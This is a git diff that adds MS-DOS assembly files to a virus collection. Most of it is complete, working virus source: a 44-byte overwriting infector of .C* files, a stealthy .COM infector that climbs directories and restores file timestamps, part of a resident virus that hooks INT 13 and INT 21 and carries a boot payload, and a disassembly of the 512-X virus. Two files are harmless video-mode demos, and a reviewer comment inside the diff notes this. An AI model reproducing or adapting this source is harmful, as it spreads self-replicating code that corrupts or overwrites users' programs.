+ sub ax,cs:data_78 ; (CS:12A5=0) + sbb dx,cs:data_79 ; (CS:12A7=0) + js loc_69 ; Jump if sign=1 + jmp short loc_71 ; (0C47) +loc_69: + call sub_13 ; (0CC6) + push cs + pop ds + mov dx,data_80 ; (CS:12A9=0) + mov cx,data_81 ; (CS:12AB=0) + add dx,0Fh + adc cx,0 + and dx,0FFF0h + sub dx,0FFCh + sbb cx,0 + mov ax,4200h + call sub_24 ; INT 21 + mov dx,4 + mov cx,1Ch + mov ah,3Fh ; '?' 
+ call sub_24 ; INT 21 + mov ax,4200h + xor cx,cx ; Zero register + mov dx,cx + call sub_24 ; INT 21 + mov dx,4 + mov cx,1Ch + mov ah,40h ; '@' + call sub_24 ; INT 21 + mov dx,0F000h + mov cx,0FFFFh + mov ax,4202h + call sub_24 ; INT 21 + mov ah,40h ; '@' + xor cx,cx ; Zero register + call sub_24 ; INT 21 + mov dx,data_78 ; (CS:12A5=0) + mov cx,data_79 ; (CS:12A7=0) + mov ax,4200h + call sub_24 ; INT 21 + mov ax,5700h + call sub_24 ; INT 21 + test dh,80h + jz loc_70 ; Jump if zero + sub dh,0C8h + mov ax,5701h + call sub_24 ; INT 21 +loc_70: + call sub_14 ; (0D6C) + jmp loc_10 ; (030F) +loc_71: + jnz loc_72 ; Jump if not zero + cmp ax,cx + ja loc_72 ; Jump if above + jmp loc_69 ; (0BC9) +loc_72: + mov dx,cs:data_78 ; (CS:12A5=0) + mov cx,cs:data_79 ; (CS:12A7=0) + or cx,cx ; Zero ? + jnz loc_73 ; Jump if not zero + cmp dx,1Ch + ja loc_73 ; Jump if above + jmp loc_69 ; (0BC9) +loc_73: + call sub_19 ; Restore REGS + call sub_24 ; INT 21 + call sub_17 ; Save REGS + mov ax,5700h + call sub_24 ; INT 21 + test dh,80h + jnz loc_74 ; Jump if not zero + add dh,0C8h + mov ax,5701h + call sub_24 ; INT 21 +loc_74: jmp loc_13 ; (0396) + jmp loc_10 ; (030F) + +int_13: pop word ptr cs:data_65 ; (CS:1241=0) + pop word ptr cs:data_65+2 ; (CS:1243=0) + pop cs:data_91 ; (CS:12DB=0) + and cs:data_91,0FFFEh ; (CS:12DB=0) + cmp byte ptr cs:data_90,0 ; (CS:12DA=0) + jne loc_75 ; Jump if not equal + push cs:data_91 ; (CS:12DB=0) + call dword ptr cs:old_INT ; (CS:122D=0) + jnc loc_76 ; Jump if carry=0 + inc cs:data_90 ; (CS:12DA=0) +loc_75: stc ; Set carry flag +loc_76: jmp dword ptr cs:data_65 ; (CS:1241=0) + +int_24: xor al,al ; Zero register + mov byte ptr cs:data_90,1 ; (CS:12DA=0) + iret ; Interrupt return + +; +; SUBROUTINE +; + +sub_13 proc near + mov byte ptr cs:data_90,0 ; (CS:12DA=0) + call sub_21 ; Save REGS in vir's stack + push cs + pop ds + mov al,13h + call sub_1 ; Get INT 13 vector + mov word ptr old_INT,bx ; (CS:122D=0) + mov word ptr old_INT+2,es ; (CS:122F=70h) + mov word 
ptr old_INT_13,bx ; (CS:1239=0) + mov word ptr old_INT_13+2,es ; (CS:123B=70h) + mov dl,0 + mov al,0Dh + call sub_1 ; Get INT 0D vector + mov ax,es + cmp ax,0C000h + jae loc_77 ; Jump if above or = + mov dl,2 +loc_77: + mov al,0Eh + call sub_1 ; Get INT 0E vector + mov ax,es + cmp ax,0C000h + jae loc_78 ; Jump if above or = + mov dl,2 +loc_78: + mov data_73,dl ; (CS:1250=0) + call sub_22 ; Set INT 01 for debuging + mov data_92,ss ; (CS:12DD=151Ch) + mov data_93,sp ; (CS:12DF=0) + push cs + mov ax,offset loc_79 + push ax + mov ax,70h + mov es,ax + mov cx,0FFFFh + mov al,0CBh + xor di,di ; Zero register + repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al + dec di + pushf ; Push flags + push es + push di + pushf ; Push flags + pop ax + or ah,1 + push ax + in al,21h ; port 21h, 8259-1 int IMR + mov data_97,al ; (CS:12E5=0) + mov al,0FFh + out 21h,al ; port 21h, 8259-1 int comands + popf ; Pop flags + xor ax,ax ; Zero register + jmp dword ptr old_INT ; (CS:122D=0) +loc_79: + lds dx,old_INT_1 ; (CS:1231=0) Load 32 bit ptr + mov al,1 + call sub_27 ; Set INT 01 vector + push cs + pop ds + mov dx,offset int_13 + mov al,13h + call sub_27 ; Set INT 13 vector + mov al,24h + call sub_1 ; Get INT 24 vector + mov word ptr old_INT_24,bx ; (CS:123D=0) + mov word ptr old_INT_24+2,es ; (CS:123F=70h) + mov dx,offset int_24 + mov al,24h + call sub_27 ; Set INT 24 vector + call sub_20 ; Restore regs from vir's stack + retn +sub_13 endp + + +; +; SUBROUTINE +; + +sub_14 proc near + call sub_21 ; Save REGS in vir's stack + lds dx,dword ptr cs:old_INT_13 ; (CS:1239=0) Load 32 bit ptr + mov al,13h + call sub_27 ; Set INT 13 vector + lds dx,dword ptr cs:old_INT_24 ; (CS:123D=0) Load 32 bit ptr + mov al,24h + call sub_27 ; Set INT 24 vector + call sub_20 ; Restore regs from vir's stack + retn +sub_14 endp + + +; +; SUBROUTINE +; + +sub_15 proc near + mov ax,3300h ; Get CTRL-BREAK state + call sub_24 ; INT 21 + mov cs:data_94,dl ; (CS:12E1) save state + mov ax,3301h + xor dl,dl ; Set CTRL-BREAK 
= OFF + call sub_24 ; INT 21 + retn +sub_15 endp + + +; +; SUBROUTINE +; + +sub_16 proc near + mov dl,cs:data_94 ; (CS:12E1) + mov ax,3301h ; Restore CTRL-BREAK state + call sub_24 ; INT 21 + retn +sub_16 endp + + +; +; SUBROUTINE +; + +sub_17 proc near + pop cs:data_100 ; (CS:12EA=0) + pushf ; Push flags + push ax + push bx + push cx + push dx + push si + push di + push ds + push es + jmp word ptr cs:data_100 ; (CS:12EA=0) +sub_17 endp + + +; +; SUBROUTINE +; + +sub_18 proc near + les di,dword ptr cs:ptr_INT_21 ; (CS:1235=0) Load 32 bit ptr + mov si,offset data_70 ; (CS:124B=0) + push cs + pop ds + cld ; Clear direction + mov cx,5 + +locloop_80: + lodsb ; String [si] to al + xchg al,es:[di] + mov [si-1],al + inc di + loop locloop_80 ; Loop if cx > 0 + + retn +sub_18 endp + + +; +; SUBROUTINE +; + +sub_19 proc near + pop cs:data_100 ; (CS:12EA=0) + pop es + pop ds + pop di + pop si + pop dx + pop cx + pop bx + pop ax + popf ; Pop flags + jmp word ptr cs:data_100 ; (CS:12EA=0) + +; External Entry into Subroutine + +sub_20: + mov cs:data_114,offset sub_19 ; (CS:135D=0) Restore REGS + jmp short loc_81 ; (0DF6) + +; External Entry into Subroutine + +sub_21: + mov cs:data_114,offset sub_17 ; (CS:135D=0) Save REGS +loc_81: mov cs:data_112,ss ; (CS:1359=151Ch) + mov cs:data_111,sp ; (CS:1357=0) + push cs + pop ss + mov sp,cs:data_113 ; (CS:135B=0) + call word ptr cs:data_114 ; (CS:135D=0) + mov cs:data_113,sp ; (CS:135B=0) + mov ss,cs:data_112 ; (CS:1359=151Ch) + mov sp,cs:data_111 ; (CS:1357=0) + retn +sub_19 endp + + +; +; SUBROUTINE +; + +sub_22 proc near + mov al,1 + call sub_1 ; Get INT 01 vector + mov word ptr cs:old_INT_1,bx ; (CS:1231=0) + mov word ptr cs:old_INT_1+2,es ; (CS:1233=70h) + push cs + pop ds + mov dx,offset debug + call sub_27 ; Set INT 01 vector + retn +sub_22 endp + +_21_48: call sub_23 ; (0E3A) + jmp loc_10 ; (030F) + +; +; SUBROUTINE +; + +sub_23 proc near + cmp byte ptr cs:data_95,0 ; (CS:12E2=0) + je loc_ret_83 ; Jump if equal + cmp bx,0FFFFh + 
jne loc_ret_83 ; Jump if not equal + mov bx,160h + call sub_24 ; INT 21 + jc loc_ret_83 ; Jump if carry Set + mov dx,cs + cmp ax,dx + jb loc_82 ; Jump if below + mov es,ax + mov ah,49h + call sub_24 ; INT 21 + jmp short loc_ret_83 ; (0E8A) +loc_82: + dec dx + mov ds,dx + mov word ptr ds:MCB_0001,0 ; (7DBC:0001=275h) + inc dx + mov ds,dx + mov es,ax + push ax + mov cs:data_72,ax ; (CS:124E=7DBDh) + xor si,si ; Zero register + mov di,si + mov cx,all_len/2 + rep movsw ; Rep when cx >0 Mov [si] to es:[di] + dec ax + mov es,ax + mov ax,cs:data_69 ; (CS:1249=0) + mov es:MCB_0001,ax ; (48FF:0001=0FFFFh) + mov ax,offset loc_ret_83 + push ax + retf +loc_ret_83: retn +sub_23 endp + +_21_37: mov byte ptr cs:data_104,2 ; (CS:12F0=0) + jmp loc_10 ; (030F) + +; +; SUBROUTINE +; + +sub_24 proc near ; calls INT 21 + pushf + call dword ptr cs:ptr_INT_21 ; (CS:1235=0) + retn +sub_24 endp + +boot: cli ; Disable interrupts + xor ax,ax ; Zero register + mov ss,ax + mov sp,7C00h + jmp short loc_85 ; (0EF4) + +data1 db 0dbh,0dbh,0dbh, 20h +data2 db 0f9h,0e0h,0e3h,0c3h + db 80h, 81h, 11h, 12h, 24h, 40h, 81h, 11h + db 12h, 24h, 40h,0F1h,0F1h, 12h, 24h, 40h + db 81h, 21h, 12h, 24h, 40h, 81h, 10h,0e3h + db 0C3h, 80h, 00h, 00h, 00h, 00h, 00h, 00h + db 00h, 00h, 00h, 00h, 82h, 44h,0F8h, 70h + db 0C0h, 82h, 44h, 80h, 88h,0C0h, 82h, 44h + db 80h, 80h,0C0h, 82h, 44h,0F0h, 70h,0C0h + db 82h, 28h, 80h, 08h,0C0h, 82h, 28h, 80h + db 88h, 00h,0F2h, 10h,0F8h, 70h,0C0h + +loc_85: push cs + pop ds + mov dx,0B000h + mov ah,0Fh + int 10h ; Video display ah=functn 0Fh + ; get state, al=mode, bh=page + cmp al,7 + je loc_86 ; Jump if equal + mov dx,0B800h +loc_86: + mov es,dx + cld ; Clear direction + xor di,di ; Zero register + mov cx,7D0h + mov ax,720h + rep stosw ; Rep when cx >0 Store ax to es:[di] + mov si,data2-boot+7C00h ; (CS:7C0E=0) + mov bx,2AEh +loc_87: + mov bp,5 + mov di,bx +loc_88: + lodsb ; String [si] to al + mov dh,al + mov cx,8 + +locloop_89: + mov ax,720h + shl dx,1 ; Shift w/zeros fill + 
jnc loc_90 ; Jump if carry=0 + mov al,0DBh +loc_90: + stosw ; Store ax to es:[di] + loop locloop_89 ; Loop if cx > 0 + + dec bp + jnz loc_88 ; Jump if not zero + add bx,0A0h + cmp si,loc_85-boot+7C00h + jb loc_87 ; Jump if below + mov ah,1 + int 10h ; Video display ah=functn 01h + ; set cursor mode in cx + mov al,8 + mov dx,loc_911-boot+7C00h + call sub_27 ; Set INT 08 vector + mov ax,7FEh + out 21h,al ; port 21h, 8259-1 int comands + ; al = 0FEh, IRQ0 (timer) only + sti ; Enable interrupts + xor bx,bx ; Zero register + mov cx,1 +loc_91: jmp short loc_91 ; SLEEP!!! +loc_911: dec cx ; INT 08 handler + jnz loc_92 ; Jump if not zero + xor di,di ; Zero register + inc bx + call sub_25 ; (0F67) + call sub_25 ; (0F67) + mov cl,4 +loc_92: + mov al,20h ; ' ' + out 20h,al ; port 20h, 8259-1 int command + ; al = 20h, end of interrupt + iret ; Interrupt return + +; +; SUBROUTINE +; + +sub_25 proc near + mov cx,28h + +locloop_93: + call sub_26 ; (0F93) + stosw ; Store ax to es:[di] + stosw ; Store ax to es:[di] + loop locloop_93 ; Loop if cx > 0 + +add1: add di,9Eh ; sub di,9Eh + mov cx,17h + +locloop_94: + call sub_26 ; (0F93) + stosw ; Store ax to es:[di] +add2: add di,9Eh ; sub di,9Eh + loop locloop_94 ; Loop if cx > 0 + +setd: std ; Set direction flag +_setd equ setd - boot + 7c00h + xor byte ptr ds:[_setd],1 ; (CS:7CE7=0) +_add1 equ add1 - boot + 7c01h + xor byte ptr ds:[_add1],28h ; (CS:7CD7=0) '(' +_add2 equ add2 - boot + 7c01h + xor byte ptr ds:[_add2],28h ; (CS:7CE2=0) '(' + retn +sub_25 endp + + +; +; SUBROUTINE +; + +sub_26 proc near + and bx,3 +_data1 equ data1 - boot + 7c00h + mov al,byte ptr ds:[_data1+bx] ; (CS:7C0A=0) + inc bx + retn +sub_26 endp + + +; +; SUBROUTINE +; + +sub_27 proc near + push es + push bx + xor bx,bx ; Zero register + mov es,bx + mov bl,al + shl bx,1 ; Shift w/zeros fill + shl bx,1 ; Shift w/zeros fill + mov es:[bx],dx + mov es:[bx+2],ds + pop bx + pop es + retn +sub_27 endp + + +; +; SUBROUTINE - *** DAMAGED BY STACK *** +; + +sub_28 proc 
near + call sub_13 ; (0CC6) + mov dl,1 + add [bp+si-4F2h],bl + pop es + jo $+2 ; Jump if overflow=1 + xor cx,word ptr ds:[32Eh] ; (0000:032E=0) + push di + sbb [bp+di],al + add byte ptr ds:[0],ah ; (0000:0000=5Bh) + add [bx+di],ah + add [bx+si+12h],dl + sbb dx,[bx] + loopnz $+11h ; Loop if zf=0, cx>0 + jnp $+23h ; Jump if not parity + db 0C1h, 02h, 31h, 41h, 7Ah, 16h + db 01h, 1Fh, 9Ah, 0Eh,0FBh, 07h + db 70h, 00h, 33h, 0Eh, 2Eh, 03h + db 57h, 18h, 57h, 1Fh,0A9h, 80h + db 00h, 00h, 57h, 1Fh +sub_28 endp + + org 1200h + +data_38 dw ? +data_40 dw ? +data_41 dw ?, ? +data_42 dw ? +data_43 dw ? +data_44 dw ? +data_45 dw ? +data_46 dw ?, ? +data_48 dw ? +data_49 dw ? + db 12 dup (?) +prm_blck_adr dw ?, ? +data_52 db ? +data_53 dw ? +data_54 dw ? +old_INT dd ? +old_INT_1 dd ? +ptr_INT_21 dd ? +old_INT_13 dd ? +old_INT_24 dd ? +data_65 dd ? +old_DS dw ? +data_68 dw ? +data_69 dw ? +data_70 db ? +data_71 dw ? +data_72 dw ? +data_73 db ? +data_74 db ? +data_75 db 50h dup (?) +data_76 db ? +data_77 dw ? +data_78 dw ? +data_79 dw ? +data_80 dw ? +data_81 dw ? +data_82 dw ? +data_83 dw ? +data_84 dw ? +data_85 dw ? +data_86 db 0Eh dup (?) +data_87 dw ? +data_88 dd ? + db ? +data_89 db 10h dup (?) +data_90 db ? +data_91 dw ? +data_92 dw ? +data_93 dw ? +data_94 db ? +data_95 db ? +old_AX dw ? +data_97 db ? +data_98 dw ? +data_99 dw ? +data_100 dw ? +data_101 dw ? +dos_ver db ? +data_103 db ? +data_104 db ? +exec_block db 0Eh dup (?) +data_106 dw ? +data_107 dw ? +entry_point dd ? +file_name db 50h dup (?) +data_111 dw ? +data_112 dw ? +data_113 dw ? +data_114 dw ? + +seg_a ends + + end + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.43.asm b/MSDOS/Virus.MSDOS.Unknown.43.asm new file mode 100644 index 00000000..3a81e855 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.43.asm 
@@ -0,0 +1,37 @@
+; Basic little bitty program for people learning about the different modes
+; you can stick on your monitor. This program will put you into 80*50 on a
+; VGA monitor, and should be 80*43 on an EGA monitor (I dunno, haven't tested
+; it.) Anyways, I tried to comment it so someone not knowing asm would be
+; able to understand it.
+;
+; Coded by The Crypt Keeper/Kevin Marcus
+; You may feel free to do absolutely anything to this code, so long as it is
+; not distributed in a modified state. (Incorporate it in your programs, I
+; don't care. Just do not change >THIS< program.)
+;
+; The Programmer's Paradise. (619)/457-1836
+
+IDEAL ; Ideal Mode in TASM is t0tallie /< rad man.
+DOSSEG ; Standard Segment shit.
+MODEL tiny ; What model are we in?!
+DATASEG ; Data Segment starts here, man.
+exitcode db 0 ; 'exitcode' be zer0, man.
+CODESEG ; Code Segment starts here, dude.
+ org 100h
+Start:
+ mov ax,0003h ; stick 3 into ax.
+ int 10h ; Set up 80*25, text mode. Clear the screen, too.
+
+ mov ax,1201h ; Woah!
+ mov bl,30h
+ int 10h ; Lets get ready for 80*43 on VGA man.
+
+ mov ax,1112h ; We are gunna use the 8*8 internal font, man.
+ int 10h ; Hey man, call the interrupt.
+
+Exit:
+
+ mov ah,4ch ; Lets ditch.
+ mov al,[exitcode] ; Make al 0. Why not xor!? Suck a ____.
+ int 21h ; "Make it so."
+ END Start ; No more program.
\ No newline at end of file
diff --git a/MSDOS/Virus.MSDOS.Unknown.44.asm b/MSDOS/Virus.MSDOS.Unknown.44.asm
new file mode 100644
index 00000000..084ed6da
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.44.asm
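Review bot: The header comment says this program puts the display into 80*50, but the code's own comment on the `int 10h` following `mov ax,1201h` / `mov bl,30h` says 80*43, and if I read that BIOS call right (VGA alternate select, BL=30h, AL=01h requests 350 scan lines) the 8x8 font loaded by `mov ax,1112h` then yields 43 rows, so the header of this file should read 80*43. The sibling `MSDOS/Virus.MSDOS.Unknown.50.asm` added in the same commit omits that call and is the 80*50 variant, so the two headers appear to have been copied without adjustment. Neither file contains infection, replication or interrupt-hooking code — both are plain text-mode demos that set a video mode and exit via `int 21h` AH=4Ch — so the `Virus.` prefix in their paths looks like a corpus mislabel worth noting in the commit description.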
@@ -0,0 +1,99 @@ +;****************************************************************************; +; ; +; -=][][][][][][][][][][][][][][][=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] [=- ; +; -=] For All Your H/P/A/V Files [=- ; +; -=] SysOp: Peter Venkman [=- ; +; -=] [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=][][][][][][][][][][][][][][][=- ; +; ; +; *** NOT FOR GENERAL DISTRIBUTION *** ; +; ; +; This File is for the Purpose of Virus Study Only! It Should not be Passed ; +; Around Among the General Public. It Will be Very Useful for Learning how ; +; Viruses Work and Propagate. But Anybody With Access to an Assembler can ; +; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ; +; Experience can Turn it Into a far More Malevolent Program Than it Already ; +; Is. Keep This Code in Responsible Hands! ; +; ; +;****************************************************************************; +;****************************************************************************** +;* 44-virus version 1.0 +;* +;* Assemble with Tasm 1.01 +;* +;* The 44 virus is a non-resident overwriting virus with a lenght +;* of 44 bytes. It will infect all files with the extension .C* +;* in the current directory. +;* +;* (c) 1991 Dark Helmet +;* +;* The author is not responsible for any damage caused by the virus +;* +;****************************************************************************** + +virus segment + org 100h + assume cs:virus + +len equ offset last-100h + +start: mov ah,04eh ; Search first file with extension .c* + xor cx,cx ; Only normal files + lea dx,com_mask ; + int 21h + +open_file: mov ax,3d02h ; open file for read/write + mov dx,9eh + int 21h + +Infect: mov cx,len ; Write virus to start of file + lea dx,start + mov ah,40h + int 21h + +Next: mov ah,3eh ; Close file + int 21h + mov ah,4fh ; Search next file + int 21h + jnb open_file ; Are there any files left? 
+ +com_mask: db "*.c*",0 ; mask +last: db 090h + +virus ends + end start + +;****************************************************************************; +; ; +; -=][][][][][][][][][][][][][][][=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] [=- ; +; -=] For All Your H/P/A/V Files [=- ; +; -=] SysOp: Peter Venkman [=- ; +; -=] [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=][][][][][][][][][][][][][][][=- ; +; ; +; *** NOT FOR GENERAL DISTRIBUTION *** ; +; ; +; This File is for the Purpose of Virus Study Only! It Should not be Passed ; +; Around Among the General Public. It Will be Very Useful for Learning how ; +; Viruses Work and Propagate. But Anybody With Access to an Assembler can ; +; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ; +; Experience can Turn it Into a far More Malevolent Program Than it Already ; +; Is. Keep This Code in Responsible Hands! ; +; ; +;****************************************************************************; + +;; +;> and Remember Don't Forget to Call <; +;> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <; +;; + diff --git a/MSDOS/Virus.MSDOS.Unknown.468.asm b/MSDOS/Virus.MSDOS.Unknown.468.asm new file mode 100644 index 00000000..4ed48693 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.468.asm 
@@ -0,0 +1,257 @@ +; virus from ALT-11 mag + +; --------------------------------------- +; +; Coded by: Azagoth +; --------------------------------------- +; Assemble using Turbo Assembler: +; tasm /m2 .asm +; tlink /t .obj +; --------------------------------------------------------------------------- +; - Non-Overwriting .COM infector (excluding COMMAND.COM) +; - COM growth: XXX bytes +; - It searches the current directory for uninfected files. If none are +; found, it searches previous directory until it reaches root and no more +; uninfected files are found. (One infection per run) +; - Also infects read-only files +; - Restores attributes, initial date/time-stamps, and original path. +; --------------------------------------------------------------------------- + + .model tiny + .code + + org 100h ; adjust for psp + +start: + + call get_disp ; push ip onto stack +get_disp: + pop bp ; bp holds current ip + sub bp, offset get_disp ; bp = code displacement + + ; original label offset is stored in machine code + ; so new (ip) - original = displacement of code + +save_path: + mov ah, 47h ; save cwd + xor dl, dl ; 0 = default drive + lea si, [bp + org_path] + int 21h + +get_dta: + mov ah, 2fh + int 21h + + mov [bp + old_dta_off], bx ; save old dta offset + +set_dta: ; point to dta record + mov ah, 1ah + lea dx, [bp + dta_filler] + int 21h + +search: + mov ah, 4eh ; find first file + mov cx, [bp + search_attrib] ; if successful dta is + lea dx, [bp + search_mask] ; created + int 21h + jnc clear_attrib ; if found, continue + +find_next: + mov ah, 4fh ; find next file + int 21h + jnc clear_attrib + +still_searching: + mov ah, 3bh + lea dx, [bp + previous_dir] ; cd .. 
+ int 21h + jnc search + jmp bomb ; at root, no more files + +clear_attrib: + mov ax, 4301h + xor cx, cx ; get rid of attributes + lea dx, [bp + dta_file_name] + int 21h + +open_file: + mov ax, 3D02h ; AL=2 read/write + lea dx, [bp + dta_file_name] + int 21h + + xchg bx, ax ; save file handle + ; bx won't change from now on +check_if_command_com: + cld + lea di, [bp + com_com] + lea si, [bp + dta_file_name] + mov cx, 11 ; length of 'COMMAND.COM' + repe cmpsb ; repeat while equal + jne check_if_infected + jmp close_file + +check_if_infected: + mov dx, word ptr [bp + dta_file_size] ; only use first word since + ; COM file + sub dx, 2 ; file size - 2 + + mov ax, 4200h + mov cx, 0 ; cx:dx ptr to offset from + int 21h ; origin of move + + mov ah, 3fh ; read last 2 characters + mov cx, 2 + lea dx, [bp + last_chars] + int 21h + + mov ah, [bp + last_chars] + cmp ah, [bp + virus_id] + jne save_3_bytes + mov ah, [bp + last_chars + 1] + cmp ah, [bp + virus_id + 1] + jne save_3_bytes + jmp close_file + +save_3_bytes: + mov ax, 4200h ; 00=start of file + xor cx, cx + xor dx, dx + int 21h + + mov ah, 3Fh + mov cx, 3 + lea dx, [bp + _3_bytes] + int 21h + +goto_eof: + mov ax, 4202h ; 02=End of file + xor cx, cx ; offset from origin of move + xor dx, dx ; (i.e. nowhere) + int 21h ; ax holds file size + + ; since it is a COM file, overflow will not occur + +save_jmp_displacement: + sub ax, 3 ; file size - 3 = jmp disp. 
+ mov [bp + jmp_disp], ax + +write_code: + mov ah, 40h + mov cx, virus_length ;*** equate + lea dx, [bp + start] + int 21h + +goto_bof: + mov ax, 4200h + xor cx, cx + xor dx, dx + int 21h + +write_jmp: ; to file + mov ah, 40h + mov cx, 3 + lea dx, [bp + jmp_code] + int 21h + + inc [bp + infections] + +restore_date_time: + mov ax, 5701h + mov cx, [bp + dta_file_time] + mov dx, [bp + dta_file_date] + int 21h + +close_file: + mov ah, 3eh + int 21h + +restore_attrib: + xor ch, ch + mov cl, [bp + dta_file_attrib] ; restore original attributes + mov ax, 4301h + lea dx, [bp + dta_file_name] + int 21h + +done_infecting?: + mov ah, [bp + infections] + cmp ah, [bp + max_infections] + jz bomb + jmp find_next + + +bomb: + +; cmp bp, 0 +; je restore_path ; original run +; +;---- Stuff deleted + +restore_path: + mov ah, 3bh ; when path stored + lea dx, [bp + root] ; '\' not included + int 21h + + mov ah, 3bh ; cd to original path + lea dx, [bp + org_path] + int 21h + +restore_dta: + mov ah, 1ah + mov dx, [bp + old_dta_off] + int 21h + +restore_3_bytes: ; in memory + lea si, [bp + _3_bytes] + mov di, 100h + cld ; auto-inc si, di + mov cx, 3 + rep movsb + +return_control_or_exit?: + cmp bp, 0 ; bp = 0 if original run + je exit + mov di, 100h ; return control back to prog + jmp di ; -> cs:100h + +exit: + mov ax, 4c00h + int 21h + +;-------- Variable Declarations -------- + +old_dta_off dw 0 ; offset of old dta address + +;-------- dta record +dta_filler db 21 dup (0) +dta_file_attrib db 0 +dta_file_time dw 0 +dta_file_date dw 0 +dta_file_size dd 0 +dta_file_name db 13 dup (0) +;-------- +search_mask db '*.COM',0 ; files to infect: *.COM +search_attrib dw 00100111b ; all files a,s,h,r +com_com db 'COMMAND.COM' + +previous_dir db '..',0 +root db '\',0 +org_path db 64 dup (0) ; original path + +infections db 0 ; counter +max_infections db 1 + +_3_bytes db 0, 0, 0 +jmp_code db 0E9h +jmp_disp dw 0 + +last_chars db 0, 0 ; do last chars = ID ? 
+ +virus_id db 'AZ' + +eov: ; end of virus + +virus_length equ offset eov - offset start + + end start + + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.50.asm b/MSDOS/Virus.MSDOS.Unknown.50.asm new file mode 100644 index 00000000..10b6ee24 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.50.asm @@ -0,0 +1,33 @@ +; Basic little bitty program for people learning about the different modes +; you can stick on your monitor. This program will put you into 80*50 on a +; VGA monitor, and should be 80*43 on an EGA monitor (I dunno, haven't tested +; it.) Anyways, I tried to comment it so someone not knowing asm would be +; able to understand it. +; +; Coded by The Crypt Keeper/Kevin Marcus +; You may feel free to do absolutely anything to this code, so long as it is +; not distributed in a modified state. (Incorporate it in your programs, I +; don't care. Just do not change >THIS< program.) +; +; The Programmer's Paradise. (619)/457-1836 + +IDEAL ; Ideal Mode in TASM is t0tallie /< rad man. +DOSSEG ; Standard Segment shit. +MODEL tiny ; What model are we in?! +DATASEG ; Data Segment starts here, man. +exitcode db 0 ; 'exitcode' be zer0, man. +CODESEG ; Code Segment starts here, dude. + org 100h +Start: + mov ax,0003h ; stick 3 into ax. + int 10h ; Set up 80*25, text mode. Clear the screen, too. + + mov ax,1112h ; We are gunna use the 8*8 internal font, man. + int 10h ; Hey man, call the interrupt. + +Exit: + + mov ah,4ch ; Lets ditch. + mov al,[exitcode] ; Make al 0. Why not xor!? Suck a ____. + int 21h ; "Make it so." + END Start ; No more program. \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.512-x.asm b/MSDOS/Virus.MSDOS.Unknown.512-x.asm new file mode 100644 index 00000000..fbb95350 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.512-x.asm 
@@ -0,0 +1,304 @@ +;NAME: 512-X.C-M +;FILE SIZE: 00200h - 512d +;START (CS:IP): 00100h +;CODE END: 00300h +;CODE ORIGIN: 00100h +;DATE: Wed Aug 05 13:56:29 1992 + +CODE SEGMENT BYTE PUBLIC 'CODE' +ASSUME CS:CODE,DS:CODE,ES:NOTHING,SS:NOTHING + +P00100 PROC + ORG 0100h + +H00100: MOV AH,30h ;00100 B430 _0 + INT 21h ;2-DOS_Ver ;00102 CD21 _! + MOV SI,0004h ;00104 BE0400 ___ + MOV DS,SI ;DS_Chg ;00107 8EDE __ + CMP AH,1Eh ;00109 80FC1E ___ + LDS AX,[SI+08h] ;0010C C54408 _D_ + JB H0011B ;0010F 720A r_ + MOV AH,13h ;00111 B413 __ + INT 2Fh ;3-Prt_Splr_Ctrl ;00113 CD2F _/ + PUSH DS ;00115 1E _ + PUSH DX ;00116 52 R + INT 2Fh ;3-Prt_Splr_Ctrl ;00117 CD2F _/ + POP AX ;00119 58 X + POP DS ;0011A 1F _ +H0011B: MOV DI,00F8h ;0011B BFF800 ___ + STOSW ;0011E AB _ + MOV AX,DS ;0011F 8CD8 __ + STOSW ;00121 AB _ + MOV DS,SI ;DS_Chg ;00122 8EDE __ + LDS AX,[SI+40h] ;00124 C54440 _D@ + STOSW ;00127 AB _ + CMP AX,0121h ;00128 3D2101 =!_ + MOV AX,DS ;0012B 8CD8 __ + STOSW ;0012D AB _ + PUSH ES ;0012E 06 _ + PUSH DI ;0012F 57 W + JNZ H00139 ;00130 7507 u_ + SHL SI,1 ;00132 D1E6 __ + MOV CX,0100h ;00134 B90001 ___ + REPZ CMPSW ;00137 F3A7 __ +H00139: PUSH CS ;00139 0E _ + POP DS ;0013A 1F _ + JZ H00187 ;0013B 744A tJ + MOV AH,52h ;0013D B452 _R + INT 21h ;2-Rsvd_INT:21h-52h ;0013F CD21 _! 
+ PUSH ES ;00141 06 _ + MOV SI,00F8h ;00142 BEF800 ___ + SUB DI,DI ;00145 2BFF +_ + LES AX,ES:[BX+12h] ;ES_Ovrd ;00147 26C44712 &_G_ + MOV DX,ES:[DI+02h] ;ES_Ovrd ;0014B 268B5502 &_U_ + MOV CX,0104h ;0014F B90401 ___ + REPZ MOVSW ;00152 F3A5 __ + MOV DS,CX ;DS_Chg ;00154 8ED9 __ + MOV DI,0016h ;00156 BF1600 ___ + MOV Word Ptr [DI+6Eh],0121h ;00159 C7456E2101 _En!_ + MOV [DI+70h],ES ;0015E 8C4570 _Ep + POP DS ;00161 1F _ + MOV [BX+14h],DX ;00162 895714 _W_ + MOV DX,CS ;00165 8CCA __ + MOV DS,DX ;DS_Chg ;00167 8EDA __ + MOV BX,[DI-14h] ;00169 8B5DEC _]_ + DEC BH ;0016C FECF __ + MOV ES,BX ;ES_Chg ;0016E 8EC3 __ + CMP DX,[DI] ;00170 3B15 ;_ + MOV DS,[DI] ;DS_Chg ;00172 8E1D __ + MOV DX,[DI] ;00174 8B15 __ + DEC DX ;00176 4A J + MOV DS,DX ;DS_Chg ;00177 8EDA __ + MOV SI,CX ;00179 8BF1 __ + MOV DX,DI ;0017B 8BD7 __ + MOV CL,28h ;0017D B128 _( + REPZ MOVSW 